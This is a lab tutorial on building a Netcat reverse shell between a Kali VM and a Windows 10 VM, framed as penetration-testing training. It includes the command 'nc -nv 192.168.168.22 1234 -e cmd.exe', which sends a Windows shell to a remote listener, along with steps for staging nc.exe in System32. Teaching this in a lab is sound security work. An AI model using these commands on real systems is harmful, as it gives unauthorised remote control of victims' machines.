Setting Up Reverse Shells Using Netcat

Learn how to set up a reverse shell using nc.exe (Netcat), a versatile tool for ethical hacking and network diagnostics. This guide provides step-by-step instructions to establish a remote connection, simulate real-world attack scenarios, and test network defenses, ensuring you operate within legal and ethical boundaries.

Mahran Al-Zyoud
|
13 steps

Kali

Microsoft

- **Virtualization Software:** Oracle VirtualBox 7.1.4 - **Host Operating System:** Windows 11 - **Guest Operating Systems:** Kali Linux & Windows 10 - **Last Updated:** November 2024 - **Created by**: Mahran Al-Zyoud. For any improvements, corrections, or suggestions, please feel free to contact me at [mahran.alzyoud@gmail.com](mailto:mahran.alzyoud@gmail.com). Your feedback is appreciated!

**Netcat**, often referred to as the "Swiss Army Knife" of networking, is a lightweight yet powerful tool widely used in penetration testing and network diagnostics. Its flexibility makes it ideal for setting up reverse shells, a technique that allows a target machine to initiate a connection back to the attacker’s system. This approach bypasses typical network restrictions like firewalls and NAT devices, making it a crucial skill for ethical hackers. **Reverse shells** using nc.exe are straightforward to configure. By setting up your system as a listener, you can execute commands remotely once the target connects. This practical setup not only simulates real-world scenarios but also highlights potential vulnerabilities in network defenses. Netcat’s simplicity and reliability ensure it remains a go-to tool for security professionals and penetration testers. In this guide, you’ll learn how to configure a reverse shell using nc.exe, with detailed, step-by-step instructions. Each step emphasizes ethical practices, ensuring your activities are compliant with legal requirements and authorized penetration testing scopes.

Note: the first 10 steps below are exactly the same as those from the following guide: [Working with Remote Shells Using Netcat](https://scribehow.com/shared/Working_with_Remote_Shells_Using_Netcat__8LJbBAjRQPukT-SeNmfoSg)

Make sure that your Kali and Windows 10 VMs are running

Get the IP address of your Kali VM. This IP address should be part of the **RedTeamNet** Internal Network. Mine as shown below is 192.168.168.22

Launch a new instance of the Terminal by right-clicking on its icon as shown below.

Within Kali Linux, there are sets of pre-loaded Windows binary files that are useful to ethical hackers and penetration testers. One of these Windows-based binaries is Netcat for Windows. \ Let’s set up a Python-based web server on our Kali Linux virtual machine to transfer the Netcat file to the target system. On Kali Linux, use the commands shown below to set up a web server within the Windows binaries directory. Once the Python web server is running within the /usr/share/windows-binaries directory, any user that connects to Kali Linux on port 8080 will be able to view and download files from the directory.

Login to Windows 10 VM and get its IP address to confirm that it has one from the **RedTeamNet** Internal Network. Mine as shown below is 192.168.168.23

Launch a browser (e.g. Microsoft Edge) in the Windows 10 VM. Go to this URL: http://KALI_IP_ADDRESS:LISTENING_PORT. Replace KALI_IP_ADDRESS with your Kali VM's IP address, and if you followed step 4 above, use 8080 as the LISTENING_PORT. Click on **nc.exe** to download it.

When the download completes, click "**Show in folder**"

Right-click the downloaded file (nc) and select "**Copy**"

Go to C:\\Windows\\System32 and right-click there then select "**Paste**"

Click "**Continue**" **Note**: After downloading the file, you can quit the Python web server by pressing **Ctrl + Z** on the keyboard.

Use the following commands on Kali Linux to set up a Netcat listener to capture any incoming connections: [[nc -nlvp 1234]] - \-n: to use the IP address only and not perform Domain Name System (DNS) queries - \-l: to listen for incoming connections - \-v: to use the verbose mode - \-p: to specify the listening port number

On Windows 10 VM, open **Command Prompt** and use the following command to create a reverse connection to the listener on Kali Linux, while sending the Command Prompt shell to Kali Linux: [[nc -nv 192.168.168.22 1234 -e cmd.exe]] - \-n: to use the IP address only and not perform Domain Name System (DNS) queries - \-v: to use the verbose mode - \-e: to execute a specified command after a connection is established. **Note:** When you use the 'e' option, Netcat launches the specified program or script and connects its input/output to the network socket. This allows you to interact with the command through the established connection.

As shown below, the Windows machine was able to successfully connect to the\ Netcat listener and provide the local shell, enabling the remote user on Kali Linux to perform remote command execution.